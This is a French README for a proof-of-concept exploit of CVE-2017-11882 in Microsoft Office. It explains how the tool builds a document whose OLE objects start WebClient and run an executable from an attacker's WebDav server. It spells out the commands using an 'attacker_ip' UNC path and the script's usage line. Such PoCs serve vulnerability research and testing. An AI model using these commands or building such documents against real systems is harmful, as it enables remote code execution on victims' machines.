
Exploits de preuve de concept pour CVE-2017-11882
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Recherche : https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Analyse du correctif : https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
Démonstration de l’exploitation PoC : https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
Un PoC simple pour CVE-2017-11882. Cet exploit déclenche le démarrage du service WebClient et exécute un fichier distant depuis un serveur WebDav contrôlé par l’attaquant. Cette approche peut être pratique en raison de la limitation de la longueur des commandes exécutées. Cependant, à l’aide de WebDav, il est possible de lancer un exécutable arbitraire contrôlé par l’attaquant sur la machine vulnérable. Ce script crée un document simple contenant plusieurs objets OLE. Ces objets exploitent CVE-2017-11882, ce qui entraîne l’exécution séquentielle de commandes.
La première commande qui déclenche le démarrage du service WebClient peut ressembler à ceci :
cmd.exe /c start \\attacker_ip\ff
Le chemin du binaire contrôlé par l’attaquant doit être un chemin réseau UNC :
\\attacker_ip\ff\1.exe
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
Le dossier example contient un fichier .rtf qui exploite la vulnérabilité CVE-2017-11882 et exécute la calculatrice dans le système.